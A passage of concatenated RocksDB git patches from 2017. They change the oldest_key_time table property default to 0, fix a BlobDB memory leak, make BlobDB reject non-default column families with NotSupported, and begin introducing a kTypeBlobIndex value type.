diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index dd11ea7e8e5..02234a2e2f3 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 0 +#define ROCKSDB_PATCH 1 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From 30b38c98cf7757d4b2d24db550a5c4ed70df8a6d Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 27 Oct 2017 14:49:40 -0700 Subject: [PATCH 167/205] TableProperty::oldest_key_time defaults to 0 Summary: We don't propagate TableProperty::oldest_key_time on compaction and just write the default value to SST files. It is more natural to default the value to 0. Also revert db_sst_test back to before #2842. Closes https://github.com/facebook/rocksdb/pull/3079 Differential Revision: D6165702 Pulled By: yiwu-arbug fbshipit-source-id: ca3ce5928d96ae79a5beb12bb7d8c640a71478a0 --- db/builder.h | 6 ++---- db/db_sst_test.cc | 26 +++++++++++++++++--------- db/flush_job.cc | 1 - db/internal_stats.cc | 11 ++++++++--- include/rocksdb/table_properties.h | 5 ++--- table/block_based_table_builder.cc | 3 +-- table/block_based_table_builder.h | 2 +- table/table_builder.h | 4 +--- 8 files changed, 32 insertions(+), 26 deletions(-) diff --git a/db/builder.h b/db/builder.h index f637368822b..5a5081c647e 100644 --- a/db/builder.h +++ b/db/builder.h @@ -6,7 +6,6 @@ // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. #pragma once -#include <limits> #include #include #include @@ -52,7 +51,7 @@ TableBuilder* NewTableBuilder( const CompressionOptions& compression_opts, int level, const std::string* compression_dict = nullptr, const bool skip_filters = false, const uint64_t creation_time = 0, - const uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max()); + const uint64_t oldest_key_time = 0); // Build a Table file from the contents of *iter. The generated file // will be named according to number specified in meta. On success, the rest of @@ -79,7 +78,6 @@ extern Status BuildTable( EventLogger* event_logger = nullptr, int job_id = 0, const Env::IOPriority io_priority = Env::IO_HIGH, TableProperties* table_properties = nullptr, int level = -1, - const uint64_t creation_time = 0, - const uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max()); + const uint64_t creation_time = 0, const uint64_t oldest_key_time = 0); } // namespace rocksdb diff --git a/db/db_sst_test.cc b/db/db_sst_test.cc index 56e00df83f7..e01754c44e4 100644 --- a/db/db_sst_test.cc +++ b/db/db_sst_test.cc @@ -650,9 +650,18 @@ TEST_F(DBSSTTest, OpenDBWithInfiniteMaxOpenFiles) { } TEST_F(DBSSTTest, GetTotalSstFilesSize) { + // We don't propagate the oldest-key-time table property on compaction and + // just write 0 as the default value. This affects the exact table size, since + // we encode table properties as varint64. Force time to be 0 to work around + // it. Should remove the workaround after we propagate the property on + // compaction.
+ std::unique_ptr mock_env(new MockTimeEnv(Env::Default())); + mock_env->set_current_time(0); + Options options = CurrentOptions(); options.disable_auto_compactions = true; options.compression = kNoCompression; + options.env = mock_env.get(); DestroyAndReopen(options); // Generate 5 files in L0 for (int i = 0; i < 5; i++) { @@ -701,13 +710,9 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) { ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", &total_sst_files_size)); // Live SST files = 1 (compacted file) - // The 5 bytes difference comes from oldest-key-time table property isn't - // propagated on compaction. It is written with default value - // std::numeric_limits::max as varint64. - ASSERT_EQ(live_sst_files_size, 1 * single_file_size + 5); - - // Total SST files = 5 original files + compacted file - ASSERT_EQ(total_sst_files_size, 5 * single_file_size + live_sst_files_size); + // Total SST files = 6 (5 original files + compacted file) + ASSERT_EQ(live_sst_files_size, 1 * single_file_size); + ASSERT_EQ(total_sst_files_size, 6 * single_file_size); // hold current version std::unique_ptr iter2(dbfull()->NewIterator(ReadOptions())); @@ -728,14 +733,14 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) { &total_sst_files_size)); // Live SST files = 0 // Total SST files = 6 (5 original files + compacted file) - ASSERT_EQ(total_sst_files_size, 5 * single_file_size + live_sst_files_size); + ASSERT_EQ(total_sst_files_size, 6 * single_file_size); iter1.reset(); ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", &total_sst_files_size)); // Live SST files = 0 // Total SST files = 1 (compacted file) - ASSERT_EQ(total_sst_files_size, live_sst_files_size); + ASSERT_EQ(total_sst_files_size, 1 * single_file_size); iter2.reset(); ASSERT_TRUE(dbfull()->GetIntProperty("rocksdb.total-sst-files-size", @@ -743,6 +748,9 @@ TEST_F(DBSSTTest, GetTotalSstFilesSize) { // Live SST files = 0 // Total SST files = 0 ASSERT_EQ(total_sst_files_size, 0); + + // Close db before mock_env destruct. + Close(); } TEST_F(DBSSTTest, GetTotalSstFilesSizeVersionsFilesShared) { diff --git a/db/flush_job.cc b/db/flush_job.cc index f0903f79b46..778c9eca124 100644 --- a/db/flush_job.cc +++ b/db/flush_job.cc @@ -16,7 +16,6 @@ #include #include -#include #include #include "db/builder.h" diff --git a/db/internal_stats.cc b/db/internal_stats.cc index 2eff2865261..e98bd98cf77 100644 --- a/db/internal_stats.cc +++ b/db/internal_stats.cc @@ -800,10 +800,15 @@ bool InternalStats::HandleEstimateOldestKeyTime(uint64_t* value, DBImpl* /*db*/, *value = std::numeric_limits::max(); for (auto& p : collection) { *value = std::min(*value, p.second->oldest_key_time); + if (*value == 0) { + break; + } + } + if (*value > 0) { + *value = std::min({cfd_->mem()->ApproximateOldestKeyTime(), + cfd_->imm()->ApproximateOldestKeyTime(), *value}); } - *value = std::min({cfd_->mem()->ApproximateOldestKeyTime(), - cfd_->imm()->ApproximateOldestKeyTime(), *value}); - return *value < std::numeric_limits::max(); + return *value > 0 && *value < std::numeric_limits::max(); } void InternalStats::DumpDBStats(std::string* value) { diff --git a/include/rocksdb/table_properties.h b/include/rocksdb/table_properties.h index e8bbabc3ba7..2605fadd257 100644 --- a/include/rocksdb/table_properties.h +++ b/include/rocksdb/table_properties.h @@ -4,7 +4,6 @@ #pragma once #include -#include #include #include #include "rocksdb/status.h" @@ -164,8 +163,8 @@ struct TableProperties { // The time when the SST file was created. 
// Since SST files are immutable, this is equivalent to last modified time. uint64_t creation_time = 0; - // Timestamp of the earliest key - uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max(); + // Timestamp of the earliest key. 0 means unknown. + uint64_t oldest_key_time = 0; // Name of the column family with which this SST file is associated. // If column family is unknown, `column_family_name` will be an empty string. diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index d48c48cfdd1..e82f91aec7f 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -10,7 +10,6 @@ #include "table/block_based_table_builder.h" #include -#include <limits> #include #include @@ -276,7 +275,7 @@ struct BlockBasedTableBuilder::Rep { uint32_t column_family_id; const std::string& column_family_name; uint64_t creation_time = 0; - uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max(); + uint64_t oldest_key_time = 0; std::vector<std::unique_ptr<IntTblPropCollector>> table_properties_collectors; diff --git a/table/block_based_table_builder.h b/table/block_based_table_builder.h index c9197ef5cce..36dfce1f0fb 100644 --- a/table/block_based_table_builder.h +++ b/table/block_based_table_builder.h @@ -48,7 +48,7 @@ class BlockBasedTableBuilder : public TableBuilder { const CompressionOptions& compression_opts, const std::string* compression_dict, const bool skip_filters, const std::string& column_family_name, const uint64_t creation_time = 0, - const uint64_t oldest_key_time = std::numeric_limits<uint64_t>::max()); + const uint64_t oldest_key_time = 0); // REQUIRES: Either Finish() or Abandon() has been called. ~BlockBasedTableBuilder(); diff --git a/table/table_builder.h b/table/table_builder.h index d0ca0678ef2..e5e7d6e22f7 100644 --- a/table/table_builder.h +++ b/table/table_builder.h @@ -10,7 +10,6 @@ #pragma once #include <stdint.h> -#include <limits> #include #include #include @@ -56,8 +55,7 @@ struct TableBuilderOptions { const CompressionOptions& _compression_opts, const std::string* _compression_dict, bool _skip_filters, const std::string& _column_family_name, int _level, - const uint64_t _creation_time = 0, - const int64_t _oldest_key_time = std::numeric_limits<int64_t>::max()) + const uint64_t _creation_time = 0, const int64_t _oldest_key_time = 0) : ioptions(_ioptions), internal_comparator(_internal_comparator), int_tbl_prop_collector_factories(_int_tbl_prop_collector_factories), From 65aec19df182f9d970c651e30529abab785bcc0e Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 1 Sep 2017 14:08:19 -0700 Subject: [PATCH 168/205] Fix memory leak on blob db open Summary: Fixes #2820 Closes https://github.com/facebook/rocksdb/pull/2826 Differential Revision: D5757527 Pulled By: yiwu-arbug fbshipit-source-id: f495b63700495aeaade30a1da5e3675848f3d72f --- utilities/blob_db/blob_db.cc | 3 +++ 1 file changed, 3 insertions(+) diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index 4f95b61f284..947840751e5 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -142,16 +142,19 @@ Status BlobDB::Open(const DBOptions& db_options_input, s = bdb->OpenPhase1(); if (!s.ok()) { + delete bdb; return s; } if (no_base_db) { + *blob_db = bdb; return s; } DB* db = nullptr; s = DB::Open(db_options, dbname, column_families, handles, &db); if (!s.ok()) { + delete bdb; return s; } From eae53de3b5dba6afb57dbff5a63f1bb21ffffbff Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 8 Sep 2017 10:57:12 -0700 Subject: [PATCH 169/205] Make it explicit blob db doesn't support CF Summary: Blob db doesn't currently
support column families. Return NotSupported status explicitly. Closes https://github.com/facebook/rocksdb/pull/2825 Differential Revision: D5757438 Pulled By: yiwu-arbug fbshipit-source-id: 44de9408fd032c98e8ae337d4db4ed37169bd9fa --- utilities/blob_db/blob_db.h | 84 +++++++++++++++++----- utilities/blob_db/blob_db_impl.cc | 116 +++++++++++++++--------------- utilities/blob_db/blob_db_impl.h | 42 ++++------- utilities/blob_db/blob_db_test.cc | 33 +++++++++ 4 files changed, 173 insertions(+), 102 deletions(-) diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 8d6725f60e0..67463d07b30 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -85,34 +85,55 @@ struct BlobDBOptions { class BlobDB : public StackableDB { public: using rocksdb::StackableDB::Put; - + virtual Status Put(const WriteOptions& options, const Slice& key, + const Slice& value) override = 0; virtual Status Put(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override = 0; + const Slice& value) override { + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } + return Put(options, key, value); + } using rocksdb::StackableDB::Delete; virtual Status Delete(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key) override = 0; + virtual Status Delete(const WriteOptions& options, + ColumnFamilyHandle* column_family, + const Slice& key) override { + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } + return Delete(options, key); + } + virtual Status PutWithTTL(const WriteOptions& options, const Slice& key, + const Slice& value, uint64_t ttl) = 0; virtual Status PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, uint64_t ttl) = 0; - - virtual Status PutWithTTL(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t ttl) { - return PutWithTTL(options, DefaultColumnFamily(), key, value, ttl); + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } + return PutWithTTL(options, key, value, ttl); } // Put with expiration. Key with expiration time equal to // std::numeric_limits::max() means the key don't expire. 
+ virtual Status PutUntil(const WriteOptions& options, const Slice& key, + const Slice& value, uint64_t expiration) = 0; virtual Status PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, uint64_t expiration) = 0; - - virtual Status PutUntil(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t expiration) { - return PutUntil(options, DefaultColumnFamily(), key, value, expiration); + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } + return PutUntil(options, key, value, expiration); } using rocksdb::StackableDB::Get; @@ -123,25 +144,52 @@ class BlobDB : public StackableDB { using rocksdb::StackableDB::MultiGet; virtual std::vector MultiGet( const ReadOptions& options, - const std::vector& column_family, const std::vector& keys, std::vector* values) override = 0; + virtual std::vector MultiGet( + const ReadOptions& options, + const std::vector& column_families, + const std::vector& keys, + std::vector* values) override { + for (auto column_family : column_families) { + if (column_family != DefaultColumnFamily()) { + return std::vector( + column_families.size(), + Status::NotSupported( + "Blob DB doesn't support non-default column family.")); + } + } + return MultiGet(options, keys, values); + } using rocksdb::StackableDB::SingleDelete; - virtual Status SingleDelete(const WriteOptions& wopts, - ColumnFamilyHandle* column_family, - const Slice& key) override = 0; + virtual Status SingleDelete(const WriteOptions& /*wopts*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { + return Status::NotSupported("Not supported operation in blob db."); + } using rocksdb::StackableDB::Merge; - virtual Status Merge(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Merge(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported operation in blob db."); } virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override = 0; + using rocksdb::StackableDB::NewIterator; + virtual Iterator* NewIterator(const ReadOptions& options) override = 0; + virtual Iterator* NewIterator(const ReadOptions& options, + ColumnFamilyHandle* column_family) override { + if (column_family != DefaultColumnFamily()) { + // Blob DB doesn't support non-default column family. + return nullptr; + } + return NewIterator(options); + } + // Starting point for opening a Blob DB. // changed_options - critical. 
Blob DB loads and inserts listeners // into options which are necessary for recovery and atomicity diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 553f89f2a58..777018aef15 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -749,32 +749,20 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { return bfile; } -Status BlobDBImpl::Put(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, +Status BlobDBImpl::Put(const WriteOptions& options, const Slice& key, const Slice& value) { std::string new_value; Slice value_slice; uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); - return PutUntil(options, column_family, key, value_slice, expiration); + return PutUntil(options, key, value_slice, expiration); } -Status BlobDBImpl::Delete(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key) { +Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) { SequenceNumber lsn = db_impl_->GetLatestSequenceNumber(); - Status s = db_->Delete(options, column_family, key); + Status s = db_->Delete(options, key); // add deleted key to list of keys that have been deleted for book-keeping - delete_keys_q_.enqueue({column_family, key.ToString(), lsn}); - return s; -} - -Status BlobDBImpl::SingleDelete(const WriteOptions& wopts, - ColumnFamilyHandle* column_family, - const Slice& key) { - SequenceNumber lsn = db_impl_->GetLatestSequenceNumber(); - Status s = db_->SingleDelete(wopts, column_family, key); - - delete_keys_q_.enqueue({column_family, key.ToString(), lsn}); + delete_keys_q_.enqueue({DefaultColumnFamily(), key.ToString(), lsn}); return s; } @@ -788,10 +776,17 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { std::shared_ptr last_file_; bool has_put_; std::string new_value_; + uint32_t default_cf_id_; public: explicit BlobInserter(BlobDBImpl* impl, SequenceNumber seq) - : impl_(impl), sequence_(seq), has_put_(false) {} + : impl_(impl), + sequence_(seq), + has_put_(false), + default_cf_id_(reinterpret_cast( + impl_->DefaultColumnFamily()) + ->cfd() + ->GetID()) {} WriteBatch& updates_blob() { return updates_blob_; } @@ -803,6 +798,11 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status PutCF(uint32_t column_family_id, const Slice& key, const Slice& value_slice) override { + if (column_family_id != default_cf_id_) { + batch_rewrite_status_ = Status::NotSupported( + "Blob DB doesn't support non-default column family."); + return batch_rewrite_status_; + } Slice value_unc; uint64_t expiration = impl_->ExtractExpiration(key, value_slice, &value_unc, &new_value_); @@ -851,11 +851,28 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) override { + if (column_family_id != default_cf_id_) { + batch_rewrite_status_ = Status::NotSupported( + "Blob DB doesn't support non-default column family."); + return batch_rewrite_status_; + } WriteBatchInternal::Delete(&updates_blob_, column_family_id, key); sequence_++; return Status::OK(); } + virtual Status DeleteRange(uint32_t column_family_id, + const Slice& begin_key, const Slice& end_key) { + if (column_family_id != default_cf_id_) { + batch_rewrite_status_ = Status::NotSupported( + "Blob DB doesn't support non-default column family."); + return batch_rewrite_status_; + } + WriteBatchInternal::DeleteRange(&updates_blob_, 
column_family_id, + begin_key, end_key); + return Status::OK(); + } + virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, const Slice& /*key*/) override { batch_rewrite_status_ = @@ -932,12 +949,11 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { } Status BlobDBImpl::PutWithTTL(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, const Slice& value, uint64_t ttl) { uint64_t now = EpochNow(); assert(std::numeric_limits::max() - now > ttl); - return PutUntil(options, column_family, key, value, now + ttl); + return PutUntil(options, key, value, now + ttl); } Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, @@ -952,8 +968,7 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, return *compression_output; } -Status BlobDBImpl::PutUntil(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, +Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, const Slice& value_unc, uint64_t expiration) { TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); MutexLock l(&write_mutex_); @@ -992,14 +1007,11 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, bfile->PathName().c_str(), key.ToString().c_str(), value.size(), s.ToString().c_str(), bfile->DumpState().c_str()); - // Fallback just write to the LSM and get going - WriteBatch batch; - batch.Put(column_family, key, value); - return db_->Write(options, &batch); + return s; } WriteBatch batch; - batch.Put(column_family, key, index_entry); + batch.Put(key, index_entry); // this goes to the base db and can be expensive s = db_->Write(options, &batch); @@ -1123,7 +1135,6 @@ Status BlobDBImpl::AppendSN(const std::shared_ptr& bfile, std::vector BlobDBImpl::MultiGet( const ReadOptions& read_options, - const std::vector& column_family, const std::vector& keys, std::vector* values) { // Get a snapshot to avoid blob file get deleted between we // fetch and index entry and reading from the file. 
@@ -1131,21 +1142,18 @@ std::vector BlobDBImpl::MultiGet( bool snapshot_created = SetSnapshotIfNeeded(&ro); std::vector values_lsm; values_lsm.resize(keys.size()); - auto statuses = db_->MultiGet(ro, column_family, keys, &values_lsm); + auto statuses = db_->MultiGet(ro, keys, &values_lsm); TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:2"); values->resize(keys.size()); assert(statuses.size() == keys.size()); + assert(values_lsm.size() == keys.size()); for (size_t i = 0; i < keys.size(); ++i) { if (!statuses[i].ok()) { continue; } - - auto cfh = reinterpret_cast(column_family[i]); - auto cfd = cfh->cfd(); - - Status s = CommonGet(cfd, keys[i], values_lsm[i], &((*values)[i])); + Status s = CommonGet(keys[i], values_lsm[i], &((*values)[i])); statuses[i] = s; } if (snapshot_created) { @@ -1163,9 +1171,8 @@ bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { return true; } -Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, - const std::string& index_entry, std::string* value, - SequenceNumber* sequence) { +Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, + std::string* value, SequenceNumber* sequence) { Slice index_entry_slice(index_entry); BlobHandle handle; Status s = handle.DecodeFrom(&index_entry_slice); @@ -1269,10 +1276,12 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, if (bdb_options_.compression != kNoCompression) { BlockContents contents; + auto cfh = + reinterpret_cast(DefaultColumnFamily()); s = UncompressBlockContentsForCompressionType( blob_value.data(), blob_value.size(), &contents, kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, - *(cfd->ioptions())); + *(cfh->cfd()->ioptions())); *value = contents.data.ToString(); } } @@ -1299,9 +1308,10 @@ Status BlobDBImpl::CommonGet(const ColumnFamilyData* cfd, const Slice& key, Status BlobDBImpl::Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) { - auto cfh = reinterpret_cast(column_family); - auto cfd = cfh->cfd(); - + if (column_family != DefaultColumnFamily()) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); + } // Get a snapshot to avoid blob file get deleted between we // fetch and index entry and reading from the file. // TODO(yiwu): For Get() retry if file not found would be a simpler strategy. 
@@ -1310,11 +1320,11 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, Status s; std::string index_entry; - s = db_->Get(ro, column_family, key, &index_entry); + s = db_->Get(ro, key, &index_entry); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); if (s.ok()) { - s = CommonGet(cfd, key, index_entry, value->GetSelf()); + s = CommonGet(key, index_entry, value->GetSelf()); value->PinSelf(); } if (snapshot_created) { @@ -1324,15 +1334,11 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, } Slice BlobDBIterator::value() const { - Slice index_entry = iter_->value(); - - auto cfh = reinterpret_cast(cfh_); - auto cfd = cfh->cfd(); - TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:1"); TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:2"); - Status s = db_impl_->CommonGet(cfd, iter_->key(), index_entry.ToString(false), - &vpart_); + Slice index_entry = iter_->value(); + Status s = + db_impl_->CommonGet(iter_->key(), index_entry.ToString(false), &vpart_); return Slice(vpart_); } @@ -2248,14 +2254,13 @@ std::pair BlobDBImpl::RunGC(bool aborted) { return std::make_pair(true, -1); } -Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options, - ColumnFamilyHandle* column_family) { +Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options) { // Get a snapshot to avoid blob file get deleted between we // fetch and index entry and reading from the file. ReadOptions ro(read_options); bool snapshot_created = SetSnapshotIfNeeded(&ro); - return new BlobDBIterator(db_->NewIterator(ro, column_family), column_family, - this, snapshot_created, ro.snapshot); + return new BlobDBIterator(db_->NewIterator(ro), this, snapshot_created, + ro.snapshot); } Status DestroyBlobDB(const std::string& dbname, const Options& options, @@ -2299,8 +2304,7 @@ Status BlobDBImpl::TEST_GetSequenceNumber(const Slice& key, if (!s.ok()) { return s; } - auto cfh = reinterpret_cast(DefaultColumnFamily()); - return CommonGet(cfh->cfd(), key, index_entry, nullptr, sequence); + return CommonGet(key, index_entry, nullptr, sequence); } std::vector> BlobDBImpl::TEST_GetBlobFiles() const { diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index e7c49b20d4d..d8dec6d4c27 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -205,44 +205,34 @@ class BlobDBImpl : public BlobDB { // how often to schedule check seq files period static constexpr uint32_t kCheckSeqFilesPeriodMillisecs = 10 * 1000; - using rocksdb::StackableDB::Put; - Status Put(const WriteOptions& options, ColumnFamilyHandle* column_family, - const Slice& key, const Slice& value) override; + using BlobDB::Put; + Status Put(const WriteOptions& options, const Slice& key, + const Slice& value) override; - using rocksdb::StackableDB::Delete; - Status Delete(const WriteOptions& options, ColumnFamilyHandle* column_family, - const Slice& key) override; + using BlobDB::Delete; + Status Delete(const WriteOptions& options, const Slice& key) override; - using rocksdb::StackableDB::SingleDelete; - virtual Status SingleDelete(const WriteOptions& wopts, - ColumnFamilyHandle* column_family, - const Slice& key) override; - - using rocksdb::StackableDB::Get; + using BlobDB::Get; Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; - using rocksdb::StackableDB::NewIterator; - virtual Iterator* NewIterator(const ReadOptions& read_options, - ColumnFamilyHandle* 
column_family) override; + using BlobDB::NewIterator; + virtual Iterator* NewIterator(const ReadOptions& read_options) override; - using rocksdb::StackableDB::MultiGet; + using BlobDB::MultiGet; virtual std::vector MultiGet( const ReadOptions& read_options, - const std::vector& column_family, const std::vector& keys, std::vector* values) override; virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override; using BlobDB::PutWithTTL; - Status PutWithTTL(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, + Status PutWithTTL(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t ttl) override; using BlobDB::PutUntil; - Status PutUntil(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, + Status PutUntil(const WriteOptions& options, const Slice& key, const Slice& value_unc, uint64_t expiration) override; Status LinkToBaseDB(DB* db) override; @@ -282,9 +272,8 @@ class BlobDBImpl : public BlobDB { // Return true if a snapshot is created. bool SetSnapshotIfNeeded(ReadOptions* read_options); - Status CommonGet(const ColumnFamilyData* cfd, const Slice& key, - const std::string& index_entry, std::string* value, - SequenceNumber* sequence = nullptr); + Status CommonGet(const Slice& key, const std::string& index_entry, + std::string* value, SequenceNumber* sequence = nullptr); Slice GetCompressedSlice(const Slice& raw, std::string* compression_output) const; @@ -705,11 +694,9 @@ class BlobFile { class BlobDBIterator : public Iterator { public: - explicit BlobDBIterator(Iterator* iter, ColumnFamilyHandle* column_family, - BlobDBImpl* impl, bool own_snapshot, + explicit BlobDBIterator(Iterator* iter, BlobDBImpl* impl, bool own_snapshot, const Snapshot* snapshot) : iter_(iter), - cfh_(column_family), db_impl_(impl), own_snapshot_(own_snapshot), snapshot_(snapshot) { @@ -748,7 +735,6 @@ class BlobDBIterator : public Iterator { private: Iterator* iter_; - ColumnFamilyHandle* cfh_; BlobDBImpl* db_impl_; bool own_snapshot_; const Snapshot* snapshot_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 63b08bf459b..6e8c9af4bb0 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -803,6 +803,39 @@ TEST_F(BlobDBTest, ReadWhileGC) { } } +TEST_F(BlobDBTest, ColumnFamilyNotSupported) { + Options options; + options.env = mock_env_.get(); + mock_env_->set_now_micros(0); + Open(BlobDBOptions(), options); + ColumnFamilyHandle *default_handle = blob_db_->DefaultColumnFamily(); + ColumnFamilyHandle *handle = nullptr; + std::string value; + std::vector values; + // The call simply pass through to base db. It should succeed. 
+ ASSERT_OK( + blob_db_->CreateColumnFamily(ColumnFamilyOptions(), "foo", &handle)); + ASSERT_TRUE(blob_db_->Put(WriteOptions(), handle, "k", "v").IsNotSupported()); + ASSERT_TRUE(blob_db_->PutWithTTL(WriteOptions(), handle, "k", "v", 60) + .IsNotSupported()); + ASSERT_TRUE(blob_db_->PutUntil(WriteOptions(), handle, "k", "v", 100) + .IsNotSupported()); + WriteBatch batch; + batch.Put("k1", "v1"); + batch.Put(handle, "k2", "v2"); + ASSERT_TRUE(blob_db_->Write(WriteOptions(), &batch).IsNotSupported()); + ASSERT_TRUE(blob_db_->Get(ReadOptions(), "k1", &value).IsNotFound()); + ASSERT_TRUE( + blob_db_->Get(ReadOptions(), handle, "k", &value).IsNotSupported()); + auto statuses = blob_db_->MultiGet(ReadOptions(), {default_handle, handle}, + {"k1", "k2"}, &values); + ASSERT_EQ(2, statuses.size()); + ASSERT_TRUE(statuses[0].IsNotSupported()); + ASSERT_TRUE(statuses[1].IsNotSupported()); + ASSERT_EQ(nullptr, blob_db_->NewIterator(ReadOptions(), handle)); + delete handle; +} + } // namespace blob_db } // namespace rocksdb From c293472908d3b0452848483e86f99d0086eb86ea Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 3 Oct 2017 09:08:07 -0700 Subject: [PATCH 170/205] Add ValueType::kTypeBlobIndex Summary: Add the kTypeBlobIndex value type, which will be used by blob db only, to insert a (key, blob_offset) KV pair. The purpose is to 1. Make it possible to open an existing rocksdb instance as blob db. Existing values will be of kTypeValue type, while values inserted by blob db will be of kTypeBlobIndex. 2. Make rocksdb able to detect if the db contains values written by blob db and, if so, return an error. 3. Make it possible to have blob db optionally store values in SST files (with kTypeValue type) or as blob values (with kTypeBlobIndex type). The root db (DBImpl) basically treats kTypeBlobIndex as a normal value type on write. On Get, if is_blob is provided, it returns whether the value read is of kTypeBlobIndex type; if is_blob is not provided, it returns Status::NotSupported(). On scan, an allow_blob flag is passed, and if the flag is true, whether the value is of kTypeBlobIndex type is reported via iter->IsBlob(). Changes on blob db side will be in a separate patch.
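A short sketch of the read-side contract described in this summary, modeled on the db_blob_index_test.cc added below. It relies on the internal DBImpl::GetImpl overload and the WriteBatchInternal::PutBlobIndex helper introduced by this patch; the open DBImpl, column family handle, and column family id are assumed to be obtained elsewhere, as in the test:

#include <cassert>
#include <cstdint>

#include "db/db_impl.h"
#include "db/write_batch_internal.h"

void BlobIndexReadContract(rocksdb::DBImpl* db,
                           rocksdb::ColumnFamilyHandle* cfh, uint32_t cf_id) {
  // Write a (key, blob_index) pair with value type kTypeBlobIndex.
  rocksdb::WriteBatch batch;
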